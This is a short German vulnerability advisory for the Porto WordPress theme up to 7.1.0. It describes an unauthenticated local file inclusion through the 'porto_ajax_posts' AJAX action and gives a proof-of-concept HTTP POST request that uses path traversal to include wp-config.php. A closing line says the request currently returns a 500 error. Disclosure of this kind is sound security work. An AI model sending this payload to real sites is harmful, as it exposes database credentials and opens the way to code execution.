
Porto <= 7.1.0 - Nicht authentifizierte lokale Dateieinbindung über porto_ajax_posts
Porto <= 7.1.0 - Nicht authentifizierte lokale Dateieinbindung via porto_ajax_posts
Das Porto-Theme für WordPress ist in allen Versionen bis einschließlich 7.1.0 anfällig für Local File Inclusion über die Funktion 'porto_ajax_posts'. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf dem Server einzubinden und auszuführen, wodurch die Ausführung von beliebigem PHP-Code in diesen Dateien möglich ist. Dies kann verwendet werden, um Zugriffskontrollen zu umgehen, sensible Daten zu erlangen oder Codeausführung zu erreichen, falls PHP-Dateien hochgeladen und eingebunden werden können.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
Erhalte derzeit einen 500-Fehler.